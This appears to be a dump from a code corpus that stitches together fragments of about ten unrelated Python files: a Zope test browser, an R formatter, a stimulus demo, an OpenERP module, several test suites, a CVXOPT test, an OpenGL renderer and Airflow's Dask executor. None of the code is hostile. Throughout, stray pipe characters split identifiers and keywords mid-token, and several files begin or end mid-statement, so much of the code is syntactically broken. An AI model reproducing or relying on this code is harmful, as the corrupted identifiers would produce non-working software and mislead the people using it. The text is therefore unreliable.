if self._element_is_link(xpath_element):
return self._find_links_by_xpath(xpath)
elif self._element_is_control(xpath_element):
return self.find_by_name(xpath_element.name)
else:
elements.append(xpath_element)
find_by = original_find or "xpath"
query = original_selector or xpath
return ElementList([ZopeTestBrowserElement(element, self) for element in elements], find_by=find_by, query=query)
def find_by_tag(self, tag):
return self.find_by_xpath('//%s' % tag, original_find="tag", original_selector=tag)
def find_by_value(self, value):
return self.find_by_xpath('//*[@value="%s"]' % value, original_find="value", original_selector=value)
def find_by_id(self, id_value):
return self.find_by_xpath('//*[@id="%s"][1]' % id_value, original_find="id", original_selector=id_value)
def find_by_name(self, name):
elements = []
index = 0
while True:
try:
control = self._browser.getControl(name=name, index=index)
elements.append(control)
index += 1
except LookupError:
break
return ElementList([ZopeTestBrowserControlElement(element, self) for element in elements], find_by="name", query=name)
def find_link_by_text(self, text):
return self._find_links_by_xpath("//a[text()='%s']" % text)
def find_link_by_href(self, href):
return self._find_links_by_xpath("//a[@href='%s']" % href)
def find_link_by_partial_href(self, partial_href):
return self._find_links_by_xpath("//a[contains(@href, '%s')]" % partial_href)
def find_link_by_partial_text(self, partial_text):
return self._find_links_by_xpath("//a[contains(normalize-space(.), '%s')]" % partial_text)
def fill(self, name, value):
self.find_by_name(name=name).first._control.value = value
def fill_form(self, field_values):
for name, value in field_values.items():
element = self.find_by_name(name)
control = element.first._control
if control.type == 'checkbox':
if value:
control.value = control.options
else:
control.value = []
elif control.type == 'radio':
control.value = [option for option in control.options if option == value]
elif control.type == 'select':
control.value = [value]
else:
# text, textarea, password, tel
control.value = value
def choose(self, name, value):
control = self._browser.getControl(name=name)
control.value = [option for option in control.options if option == value]
def check(self, name):
control = self._browser.getControl(name=name)
control.value = control.options
def uncheck(self, name):
control = self._browser.getControl(name=name)
control.value = []
def attach_file(self, name, file_path):
filename = file_path.split('/')[-1]
control = self._browser.getControl(name=name)
content_type, _ = mimetypes.guess_type(file_path)
control.add_file(open(file_path), content_type, filename)
|
def _find_links_by_xpath(self, xpath):
html = self.htmltree
links = html.xpath(xpath)
return ElementList([ZopeTestBrowserLinkElement(link, self) for link in links], find_by="xpath", query=xpath)
def select(self, name, value):
self.find_by_name(name).first._control.val | ue = [value]
def is_text_present(self, text, wait_time=None):
wait_time = wait_time or self.wait_time
end_time = time.time() + wait_time
while time.time() < end_time:
if self._is_text_present(text):
return True
return False
def _is_text_present(self, text):
try:
body = self.find_by_tag('body').first
return text in body.text
except ElementDoesNotExist:
# This exception will be thrown if the body tag isn't present
# This has occasionally been observed. Assume that the
# page isn't fully loaded yet
return False
def is_text_not_present(self, text, wait_time=None):
wait_time = wait_time or self.wait_time
end_time = time |
google/sample-sql-translator | rfmt/blocks.py | Python | apache-2.0 | 13,911 | 0.006398 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The block language system for the R language formatter."""
from . import base
from . import support
import re
_options = base.Options() # Shorthand for convenient access
class LayoutBlock(object):
"""The abstract class at base of the block hierarchy."""
def __init__(self, is_breaking=False):
# If a newline is mandated after this block.
self.is_breaking = is_breaking
# See OptLayout method below for use of layout_cache.
self.layout_cache = {}
def Parms(self):
"""A dictionary containing the parameters of this block."""
return {}
def ReprParms(self):
"""The printed representation of this block's parameters."""
if not self.Parms(): return ''
return ('<%s>' % (', '.join('%s=%s' % (key, val.__repr__())
for key, val in self.Parms().iteritems())))
def __repr__(self):
return re.sub('[a-z]', '', self.__class__.__name__ +
'*' * self.is_breaking) + self.ReprParms()
def OptLayout(self, rest_of_line):
"""Retrieve or compute the least-cost (optimum) layout for this block.
Args:
rest_of_line: a Solution object representing the text to the right of
this block.
Returns:
A Solution object representing the optimal layout for this block and
the rest of the line.
"""
# Deeply-nested choice block may result in the same continuation supplied
# repeatedly to the same block. Without memoisation, this may result in an
# exponential blow-up in the layout algorithm.
if rest_of_line not in self.layout_cache:
self.layout_cache[rest_of_line] = self.DoOptLayout(rest_of_line)
return self.layout_cache[rest_of_line]
def DoOptLayout(self, rest_of_line):
"""Compute the least-cost (optimum) layout for this block.
Args:
rest_of_line: a Solution object representing the text to the right of
this block.
Returns:
A Solution object representing the optimal layout for this block and
the rest of the line.
"""
# Abstract method.
pass
def PrintOn(self, outp):
"""Print the contents of this block with the optimal layout.
Args:
outp: a stream on which output is to be printed.
"""
soln = self.OptLayout(None)
support.Console(outp).PrintLayout(soln.layouts[0])
class TextBlock(LayoutBlock):
"""A block containing a single unbroken string."""
def __init__(self, text, is_breaking=False):
super(TextBlock, self).__init__(is_breaking)
self.text = text
def __repr__(self):
return '*' * self.is_breaking + self.text
def DoOptLayout(self, rest_of_line):
span = len(self.text)
layout = support.Layout([support.LayoutElement.String(self.text)])
# The costs associated with the layout of this block may require 1, 2 or 3
# knots, depending on how the length of the text compares with the two
# margins (m0 and m1) in _options. Note that we assume
# _options.m1 >= _options.m0 >= 0, as asserted in base.Options.Check().
if span >= _options.m1:
s = support.Solution([0], [span],
[(span - _options.m0) * _options.c0 +
(span - _options.m1) * _options.m1],
[_options.c0 + _options.c1], [layout])
elif span >= _options.m0:
s = support.Solution([0, _options.m1 - span], [span] * 2,
[(span - _options.m0) * _options.c0,
(_options.m1 - _options.m0) * _options.c0],
[_options.c0, _options.c0 + _options.c1],
[layout] * 2)
else:
s = support.Solution([0, _options.m0 - span, _options.m1 - span],
[span] * 3,
[0, 0, (_options.m1 - _options.m0) * _options.c0],
[0, _options.c0, _options.c0 + _options.c1],
[layout] * 3)
return s.WithRestOfLine(rest_of_line)
class CompositeLayoutBlock(LayoutBlock):
"""The abstract superclass of blocks which contain other blocks (elements).
Note that we assume at least one element.
"""
def __init__(self, elements):
super(CompositeLayoutBlock, self).__init__()
self.elements = elements
# Break after this block if its last element requires a break.
self.is_breaking = elements and elements[-1].is_breaking
def ReprElements(self):
return '[%s]' % (', '.join(e.__repr__() for e in self.elements))
def __repr__(self):
return super(CompositeLayoutBlock, self).__repr__() + self.ReprElements()
class LineBlock(CompositeLayoutBlock):
"""A block that places its elements in a single line."""
def __init__(self, elements):
super(LineBlock, self).__init__(elements)
def DoOptLayout(self, rest_of_line):
if not self.elements: return rest_of_line
element_lines = [[]]
for i, elt in enumerate(self.elements):
element_lines[-1].append(elt)
if i < len(self.elements) - 1 and elt.is_breaking:
element_lines.append([])
if len(element_lines) > 1:
element_lines = _options.format_policy.BreakElementLines(element_lines)
line_solns = []
for i, ln in enumerate(element_lines):
ln_layout = None if i < len(element_lines) - 1 else rest_of_line
for elt in ln[::-1]:
ln_layout = elt.OptLayout(ln_layout)
line_solns.append(ln_layout)
soln = support.VSumSolution(line_solns)
return soln.PlusConst(_options.cb * (len(line_solns) - 1))
def IndentBlock(element, indent=None):
"""Return a block that contains another block, indented by a given amount."""
if indent is None: indent = _options.ind
return LineBlock([TextBlock(' ' * indent), element] | )
class ChoiceBlock(CompositeLayoutBlock):
"""A block which contains alternate layouts of the same content."""
# Note: All elements of a ChoiceBlock are breaking, if any are.
def __init__(self, elements):
super(ChoiceBlock, self).__init__(elements)
def DoOptLayout(self, rest_of_line):
# The optimum layout of this block is simply the piecewise minimum of its
# elements' layouts.
return support.MinSolution([e.Opt | Layout(rest_of_line)
for e in self.elements])
class MultBreakBlock(CompositeLayoutBlock):
"""The abstract superclass of blocks that locally modify line break cost."""
def __init__(self, elements, break_mult=1):
super(MultBreakBlock, self).__init__(elements)
self.break_mult = break_mult
def Parms(self):
return dict(super(MultBreakBlock, self).Parms().items() +
[('break_mult', self.break_mult)])
class StackBlock(MultBreakBlock):
"""A block that arranges its elements vertically, separated by line breaks."""
def __init__(self, elements, break_mult=1):
super(StackBlock, self).__init__(elements, break_mult)
def DoOptLayout(self, rest_of_line):
# The optimum layout for this block arranges the elements vertically. Only
# the final element is composed with the continuation provided---all the
# others see an empty continuation ("None"), since they face the end of
# a line.
if not self.elements: return rest_of_line
soln = support.VSumSolution([e.OptLayout(None)
for e in self.elements[:-1]] +
[self.elements[-1].OptLayout(rest_of_line)])
# Under some odd circumstances involving comments, we may have a degenerate
# solution.
if soln is None:
return rest_of_line
# Add the cost of the line breaks between the elements.
re |
visionegg/visionegg | demo/grating.py | Python | lgpl-2.1 | 1,456 | 0.023352 | #!/usr/bin/env python
"""Sinusoidal grating calculated in realtime."""
############################
# Import various modules #
############################
import VisionEgg
VisionEgg.start_default_logging(); VisionEgg.watch_exceptions()
from VisionEgg.Core import *
from VisionEgg.FlowControl import Presentation
from VisionEgg.Gratings import *
#####################################
# Initialize OpenGL window/screen #
#####################################
screen = get_default_screen()
######################################
# Create sinusoidal grating object #
######################################
stimulus = SinGrating2D(position = ( screen.size[0]/2.0, screen.size[1]/2.0 ),
anchor = 'center',
size = ( 300.0 , 300.0 ),
spatial_freq = 10.0 / screen.size[0], # units of cycles/pixel
temporal_freq_hz = 1.0,
orientation = 45.0 )
###############################################################
# Create view | port - intermediary between stimuli and screen #
###############################################################
viewport = Viewport( screen=screen, stimuli=[stimulus] )
########################################
# Create presentation | object and go! #
########################################
p = Presentation(go_duration=(5.0,'seconds'),viewports=[viewport])
p.go()
|
Elico-Corp/openerp-7.0 | mrp_mo_nopicking/mrp.py | Python | agpl-3.0 | 4,435 | 0.008345 | # -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)
import time
from datetime import datetime
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP
from openerp.tools import float_compare
from openerp.tools.translate import _
from openerp import SUPERUSER_ID
from openerp import netsvc
from openerp import tools
class mrp_production(osv.osv):
_inherit = 'mrp.production'
def _action_compute_lines(self, cr, uid, ids, properties=None, context=None):
""" Computes bills of material of a product.
@param properties: List containing dictionaries of properties.
@return: No. of products.
"""
if properties is None:
properties = []
results = []
bom_obj = self.pool.get('mrp.bom')
uom_obj = self.pool.get('product.uom')
prod_line_obj = self.pool.get('mrp.production.product.line')
workcenter_line_obj = self.pool.get('mrp.production.workcenter.line')
for production in self.browse(cr, uid, ids):
#unlink product_lines
prod_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.product_lines], context=context)
#unlink workcenter_lines
workcenter_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.workcenter_lines], context=context)
# search BoM structure and route
bom_point = production.bom_id
bom_id = production.bom_id.id
if not bom_point:
bom_id = bom_obj._bom_find(cr, uid, production.product_id.id, production.product_uom.id, properties)
if bom_id:
bom_point = bom_obj.browse(cr, uid, | bom_id)
routing_id = bom_point.routing_id.id or False
self.write(cr, uid, [production.id], {'bom_id': b | om_id, 'routing_id': routing_id})
if not bom_id:
continue
# get components and workcenter_lines from BoM structure
factor = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, bom_point.product_uom.id)
res = bom_obj._bom_explode(cr, uid, bom_point, factor / bom_point.product_qty, properties, routing_id=production.routing_id.id)
results = res[0] # product_lines
results2 = res[1] # workcenter_lines
# reset product_lines in production order
for line in results:
line['production_id'] = production.id
prod_line_obj.create(cr, uid, line)
#reset workcenter_lines in production order
for line in results2:
line['production_id'] = production.id
workcenter_line_obj.create(cr, uid, line)
return results
def action_ready(self, cr, uid, ids, context=None):
""" Changes the production state to Ready and location id of stock move.
@return: True
"""
move_obj = self.pool.get('stock.move')
self.write(cr, uid, ids, {'state': 'ready'})
for production in self.browse(cr, uid, ids, context=context):
if not production.bom_id:
produce_move_id = self._make_production_produce_line(cr, uid, production, context=context)
for (production_id,name) in self.name_get(cr, uid, ids):
production = self.browse(cr, uid, production_id)
if production.move_prod_id and production.move_prod_id.location_id.id != production.location_dest_id.id:
move_obj.write(cr, uid, [production.move_prod_id.id],
{'location_id': production.location_dest_id.id})
return True
def action_produce(self, cr, uid, production_id, production_qty, production_mode, context=None):
production = self.browse(cr, uid, production_id, context=context)
if not production.bom_id and production.state == 'ready':
wf_service = netsvc.LocalService("workflow")
wf_service.trg_validate(uid, 'mrp.production', production_id, 'button_produce', cr)
return super(mrp_production, self).action_produce(cr, uid, production_id, production_qty, production_mode, context=context)
mrp_production()
|
cisco-openstack/tempest | tempest/api/object_storage/test_crossdomain.py | Python | apache-2.0 | 2,264 | 0 | # Copyright (C) 2013 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
| # a copy of the License at
#
# http://www.apache.org/licenses/LICENS | E-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.object_storage import base
from tempest.common import custom_matchers
from tempest.common import utils
from tempest.lib import decorators
class CrossdomainTest(base.BaseObjectTest):
@classmethod
def resource_setup(cls):
super(CrossdomainTest, cls).resource_setup()
cls.xml_start = '<?xml version="1.0"?>\n' \
'<!DOCTYPE cross-domain-policy SYSTEM ' \
'"http://www.adobe.com/xml/dtds/cross-domain-policy.' \
'dtd" >\n<cross-domain-policy>\n'
cls.xml_end = "</cross-domain-policy>"
def setUp(self):
super(CrossdomainTest, self).setUp()
@decorators.idempotent_id('d1b8b031-b622-4010-82f9-ff78a9e915c7')
@utils.requires_ext(extension='crossdomain', service='object')
def test_get_crossdomain_policy(self):
url = self.account_client._get_base_version_url() + "crossdomain.xml"
resp, body = self.account_client.raw_request(url, "GET")
self.account_client._error_checker(resp, body)
body = body.decode()
self.assertTrue(body.startswith(self.xml_start) and
body.endswith(self.xml_end))
# The target of the request is not any Swift resource. Therefore, the
# existence of response header is checked without a custom matcher.
self.assertIn('content-length', resp)
self.assertIn('content-type', resp)
self.assertIn('x-trans-id', resp)
self.assertIn('date', resp)
# Check only the format of common headers with custom matcher
self.assertThat(resp, custom_matchers.AreAllWellFormatted())
|
tommy-u/chaco | chaco/tools/tests/better_zoom_test_case.py | Python | bsd-3-clause | 1,537 | 0 | # Copyright (c) 2014, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/l | icenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
""" Tests for the BetterZoom Chaco tool """
import unittest
import numpy
from chaco.api import create_line_plot
from chaco.tools.api import BetterZoom
from enable.testing import EnableTestAssistant
class TestBetterZoomTool(EnableTestAssi | stant, unittest.TestCase):
""" Tests for the BetterZoom Chaco tool """
def setUp(self):
values = numpy.arange(10)
self.plot = create_line_plot((values, values))
self.plot.bounds = [100, 100]
self.plot._window = self.create_mock_window()
self.tool = BetterZoom(component=self.plot)
self.plot.active_tool = self.tool
self.plot.do_layout()
def tearDown(self):
del self.tool
del self.plot
def test_default_position(self):
tool = self.tool
# this doesn't throw an exception
self.send_key(tool, '+')
self.assertEqual(tool.position, (50, 50))
# expected behaviour for a normal zoom in operation
self.assertNotEqual(tool._index_factor, 1.0)
self.assertNotEqual(tool._value_factor, 1.0)
self.assertEqual(len(tool._history), 2)
|
felipeZ/nonAdiabaticCoupling | scripts/hamiltonians/plot_couplings.py | Python | mit | 2,000 | 0 | #! /usr/bin/env python
"""
This programs plots the electronic coupling between two states.
It reads all Ham_*_im files and cache them in a tensor saved on disk.
Usage:
plot_couplings.py -p . -s1 XX -s2 YY -dt 1.0
p = path to the hamiltonian files
s1 = state 1 index
s2 = state 2 index
dt = time step in fs
"""
import numpy as np
import matplotlib.pyplot as plt
import argparse
import glob
import os.path
r2meV = 13605.698 # From Rydeberg to eV
def main(path_output, s1, s2, dt):
# Check if the file with couplings exists
if not os.path.isfile('couplings.npy'):
# Check all the files stored
files_im = glob.glob('Ham_*_im')
# Read the couplings
couplings = np.stack(
np.loadtxt(f'Ham_{f}_im') for f in range(len(files_im)))
# Save the file for fast r | eading afterwards
np.save('couplings', couplings)
else:
couplings = np.load | ('couplings.npy')
ts = np.arange(couplings.shape[0]) * dt
plt.plot(ts, couplings[:, s1, s2] * r2meV)
plt.xlabel('Time (fs)')
plt.ylabel('Energy (meV)')
plt.show()
def read_cmd_line(parser):
"""
Parse Command line options.
"""
args = parser.parse_args()
attributes = ['p', 's1', 's2', 'dt']
return [getattr(args, p) for p in attributes]
if __name__ == "__main__":
msg = "plot_decho -p <path/to/hamiltonians> -s1 <State 1> -s2 <State 2>\
-dt <time step>"
parser = argparse.ArgumentParser(description=msg)
parser.add_argument('-p', required=True,
help='path to the Hamiltonian files in Pyxaid format')
parser.add_argument('-s1', required=True, type=int,
help='Index of the first state')
parser.add_argument('-s2', required=True, type=int,
help='Index of the second state')
parser.add_argument('-dt', type=float, default=1.0,
help='Index of the second state')
main(*read_cmd_line(parser))
|
seanballais/botos | tests/test_admin.py | Python | gpl-3.0 | 95,577 | 0.00135 | # This test is partly based from:
# https://www.argpar.se/posts/programming/testing-django-admin/
from urllib.parse import urljoin
import json
from bs4 import BeautifulSoup
from django import forms
from django.contrib.admin import ACTION_CHECKBOX_NAME
from django.contrib.admin.sites import AdminSite
from django.contrib.contenttypes.models import ContentType
from django.contrib.messages import get_messages
from django.test import (
RequestFactory, TestCase
)
from django.urls import reverse
from core.admin import (
AdminUserAdmin, ElectionAdmin, VoterAdmin, VoterProfileInline, AdminUser,
Voter, AdminCreationForm, VoterCreationForm, CandidateForm,
)
from core.models import (
User, Batch, Section, VoterProfile, UserType, Candidate, CandidateParty,
CandidatePosition, Election, Vote
)
class MockSuperUser:
def has_perm(self, perm):
return True
class AdminLoginViewTest(TestCase):
"""
Tests admin login view.
"""
def test_admin_login_redirects_to_index(self):
response = self.client.get(reverse('admin:login'), follow=True)
self.assertRedirects(response, reverse('index'))
def test_admin_login_with_next_redirects_to_index(self):
response = self.client.get(
reverse('admin:login'),
{
'next': reverse('results')
},
follow=True
)
self.assertRedirects(
response,
'{}?next={}'.format(reverse('index'), reverse('results'))
)
class BatchAdminTest(TestCase):
"""
Tests the Batch admin.
"""
@classmethod
def setUpTestData(cls):
cls._election0 = Election.objects.create(name='Election 0')
cls._election1 = Election.objects.create(name='Election 1')
cls._batch0 = Batch.objects.create(year=0, election=cls._election0)
_batch1 = Batch.objects.create(year=1, election=cls._election1)
_section0 = Section.objects.create(section_name='Section 0')
_section1 = Section.objects.create(section_name='Section 1')
_voted_user0 = User.objects.create(
username='pedro',
type=UserType.VOTER
)
_voted_user0.set_password('pendoko')
_voted_user0.save()
_voted_user1 = User.objects.create(
username='pedro1',
type=UserType.VOTER
)
_voted_user1.set_password('pendoko1')
_voted_user1.save()
VoterProfile.objects.create(
user=_voted_user0,
has_voted=True,
batch=cls._batch0,
section=_section0
)
VoterProfile.objects.create(
user=_voted_user1,
has_voted=True,
batch=_batch1,
section=_section1
)
_party0 = CandidateParty.objects.create(
party_name='Awesome Party 0',
election=cls._election0
)
_party1 = CandidateParty.objects.create(
party_name='Awesome Party 1',
election=cls._election1
)
_position0 = CandidatePosition.objects.create(
position_name='Amazing Position 0',
position_level=0,
max_num_selected_candidates=2,
election=cls._election0
)
_position1 = CandidatePosition.objects.create(
position_name='Amazing Position 1',
position_level=1,
max_num_selected_candidates=1,
election=cls._election1
)
_candidate0 = Candidate.objects.create(
user=_voted_user0,
party=_party0,
position=_position0,
election=cls._election0
)
_candidate1 = Candidate.objects.create(
user=_voted_user1,
party=_party1,
position=_position1,
election=cls._election1
)
admin = User.objects.create(
username='admin',
type=UserType.ADMIN
)
admin.set_password('root')
admin.save()
def setUp(self):
self.client | .login(username='admin', password='root')
# We have to refresh _ba | tch0 since it gets modified in many tests.
# Modifications to an object created inside setUpTestData() in a test
# method will persist across test methods. Fortunately, the changes
# are only present in memory. So, we can just refresh the original
# content of the object from the database using refresh_from_db().
# For more related information, you may visit this page:
# https://docs.djangoproject.com
# /en/2.2/topics/testing/tools/
# #django.test.TestCase.setUpTestData
self._batch0.refresh_from_db()
def test_change_view_denies_anonymous_users(self):
self.client.logout()
response = self.client.get(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
index_url = urljoin(
reverse('index'),
'?next={}'.format(
reverse(
'admin:core_batch_change',
args=(self._batch0.id,)
)
)
)
self.assertRedirects(response, index_url)
def test_change_view_denies_voters(self):
self.client.login(username='pedro', password='pendoko')
response = self.client.get(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
index_url = urljoin(
reverse('index'),
'?next={}'.format(
reverse(
'admin:core_batch_change',
args=(self._batch0.id,)
)
)
)
self.assertRedirects(response, index_url)
def test_change_view_post_denies_anonymous_users(self):
self.client.logout()
response = self.client.post(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
index_url = urljoin(
reverse('index'),
'?next={}'.format(
reverse(
'admin:core_batch_change',
args=(self._batch0.id,)
)
)
)
self.assertRedirects(response, index_url)
def test_change_view_post_denies_voters(self):
self.client.login(username='pedro', password='pendoko')
response = self.client.post(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
index_url = urljoin(
reverse('index'),
'?next={}'.format(
reverse(
'admin:core_batch_change',
args=(self._batch0.id,)
)
)
)
self.assertRedirects(response, index_url)
def test_change_view_shows_form(self):
response = self.client.get(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
follow=True
)
self.assertTemplateUsed(response, 'admin/change_form.html')
def test_change_view_voter_saves_no_election_change(self):
response = self.client.post(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
{
'year': self._batch0.year + 10,
'election': self._batch0.election.id,
'_save': 'Save'
},
follow=True
)
self._batch0.refresh_from_db()
self.assertEqual(self._batch0.year, 10)
self.assertEqual(self._batch0.election.id, self._election0.id)
self.assertEqual(Candidate.objects.all().count(), 2)
self.assertRedirects(response, reverse('admin:core_batch_changelist'))
def test_change_view_voter_saves_continue_editing_no_election_change(self):
response = self.client.post(
reverse('admin:core_batch_change', args=( self._batch0.id, )),
{
'year': self._batch0.year + 10,
'election': self._batch0.election.id,
|
hrautila/go.opt | tests/py/testsdp.py | Python | lgpl-3.0 | 1,573 | 0.019072 | #
# This is copied from CVXOPT examples and modified to be used as test reference
# for corresponding Go program.
#
import sys
from cvxopt import matrix, solvers
import helpers
import localcones
def testsdp(opts):
c = matrix([1.,-1.,1.])
G = [ matrix([[-7., -11., -11., 3.],
[ 7., -18., -18., 8.],
[-2., -8., -8., 1.]]) ]
G += [ matrix([[-21., -11., 0., -11., 10., 8., 0., 8., 5.],
[ 0., 10., 16., 10., -10., -10., | 16., -10., 3.],
[ -5., 2., -17., 2., -6., 8., -17., -7., 6.]]) ]
h = [ matrix([[33., -9.], [-9., 26.]]) ]
h += [ matrix([[14., 9., 40.], [9., 91., 10.], [40., 10., 15.]]) ]
solvers.options.update(opts)
sol = solvers.sdp(c, Gs=G, hs=h)
#localcones.options.update(opts)
#sol = localcones.sdp(c | , Gs=G, hs=h)
print "x = \n", helpers.str2(sol['x'], "%.9f")
print "zs[0] = \n", helpers.str2(sol['zs'][0], "%.9f")
print "zs[1] = \n", helpers.str2(sol['zs'][1], "%.9f")
print "\n *** running GO test ***"
rungo(sol)
def rungo(sol):
helpers.run_go_test("../testsdp", {'x': sol['x'],
'ss0': sol['ss'][0],
'ss1': sol['ss'][1],
'zs0': sol['zs'][0],
'zs1': sol['zs'][1]})
if len(sys.argv[1:]) > 0:
if sys.argv[1] == "-sp":
helpers.sp_reset("./sp.data")
helpers.sp_activate()
testsdp({'maxiters': 20})
|
szecsi/Gears | GearsPy/Project/Components/Forward/Flyby.py | Python | gpl-2.0 | 2,803 | 0.0264 | import Gears as gears
from .. import *
try:
from OpenGL.GL import *
from OpenGL.GLU import *
except:
print ('ERROR: PyOpenGL not installed properly.')
import random
def box() :
glBegin(GL_QUADS)
glColor3f(0.0,1.0,0.0)
glVertex3f(1.0, 1.0,-1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(1.0, 1.0, 1.0)
glColor3f(1.0,0.5,0.0)
glVertex3f(1.0,-1.0, 1.0)
glVertex3f(-1.0,-1.0, 1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(1.0,-1.0,-1.0)
glColor3f(1.0,0.0,0.0)
glVertex3f(1.0, 1.0, 1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(-1.0,-1.0, 1.0)
glVertex3f(1.0,-1.0, 1.0)
glColor3f(1.0,1.0,0.0)
glVertex3f(1.0,-1.0,-1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(1.0, 1.0,-1.0)
glColor3f(0.0,0.0,1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(-1.0,-1.0, 1.0)
glColor3f(1.0,0.0,1.0)
glVertex3f(1.0, 1.0,-1.0)
glVertex3f(1.0, 1.0, 1.0)
glVertex3f(1.0,-1.0, 1.0)
glVertex3f(1.0,-1.0,-1.0)
glEnd()
class Flyby() :
args = None
def __init__(self, **args):
self.args = args
def apply(self, stimulus) :
self.applyWithArgs(stimulus, **self.args)
def applyWithArgs(
self,
stimulus,
) :
stimulus.enableColorMode()
stimulus.setForwardRenderingCallback(self.render)
stimulus.registerCallback(gears.StimulusStartEvent.typeId, self.start)
stimulus.registerCallback(gears.StimulusEndEvent.typeId, self.finish)
def start( self, event ):
print('hello start flyby')
self.glist = glGenLists(1)
glNewList(self.glist, GL_COMPILE)
for i in range(0, 400) :
glPushMatrix()
glTranslated(
random.uniform( a = -20, b = 20),
random | .uniform( a = -20, b = 20),
random.uniform( a = -20, b = | 20),
)
box()
glPopMatrix()
glEndList()
def finish( self, event ):
glDeleteLists(self.glist, 1)
def render(self, iFrame):
glEnable(GL_DEPTH_TEST)
glDepthMask(GL_TRUE);
glClearColor(0.0, 0.0, 0.0, 1.0 )
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(45, 1, 0.1, 1000)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0, 0, 20- iFrame * 0.1, 0, 0, 19 - iFrame * 0.1, 0, 1, 0)
glTranslated(0, 0, -40 * (iFrame // 400))
glCallList(self.glist)
glTranslated(0, 0, -40)
glCallList(self.glist)
glDisable(GL_DEPTH_TEST)
glDepthMask(GL_FALSE);
|
dhuang/incubator-airflow | airflow/executors/dask_executor.py | Python | apache-2.0 | 4,430 | 0.000903 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
DaskExecutor
.. seealso::
For more information on how the DaskExecutor works, take a look at the guide:
:ref:`executor:DaskExecutor`
"""
import subprocess
from typing import Any, Dict, Optional
from distributed import Client, Future, as_completed
from distributed.security import Security
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.executors.base_executor import NOT_STARTED_MESSAGE, BaseExecutor, CommandType
from airflow.models.taskinstance import TaskInstanceKey
class DaskExecutor(BaseExecutor):
"""DaskExecutor submits tasks | to a Dask Distributed cluster.""" |
def __init__(self, cluster_address=None):
super().__init__(parallelism=0)
if cluster_address is None:
cluster_address = conf.get('dask', 'cluster_address')
if not cluster_address:
raise ValueError('Please provide a Dask cluster address in airflow.cfg')
self.cluster_address = cluster_address
# ssl / tls parameters
self.tls_ca = conf.get('dask', 'tls_ca')
self.tls_key = conf.get('dask', 'tls_key')
self.tls_cert = conf.get('dask', 'tls_cert')
self.client: Optional[Client] = None
self.futures: Optional[Dict[Future, TaskInstanceKey]] = None
def start(self) -> None:
if self.tls_ca or self.tls_key or self.tls_cert:
security = Security(
tls_client_key=self.tls_key,
tls_client_cert=self.tls_cert,
tls_ca_file=self.tls_ca,
require_encryption=True,
)
else:
security = None
self.client = Client(self.cluster_address, security=security)
self.futures = {}
def execute_async(
self,
key: TaskInstanceKey,
command: CommandType,
queue: Optional[str] = None,
executor_config: Optional[Any] = None,
) -> None:
self.validate_command(command)
def airflow_run():
return subprocess.check_call(command, close_fds=True)
if not self.client:
raise AirflowException(NOT_STARTED_MESSAGE)
future = self.client.submit(airflow_run, pure=False)
self.futures[future] = key # type: ignore
def _process_future(self, future: Future) -> None:
if not self.futures:
raise AirflowException(NOT_STARTED_MESSAGE)
if future.done():
key = self.futures[future]
if future.exception():
self.log.error("Failed to execute task: %s", repr(future.exception()))
self.fail(key)
elif future.cancelled():
self.log.error("Failed to execute task")
self.fail(key)
else:
self.success(key)
self.futures.pop(future)
def sync(self) -> None:
if self.futures is None:
raise AirflowException(NOT_STARTED_MESSAGE)
# make a copy so futures can be popped during iteration
for future in self.futures.copy():
self._process_future(future)
def end(self) -> None:
if not self.client:
raise AirflowException(NOT_STARTED_MESSAGE)
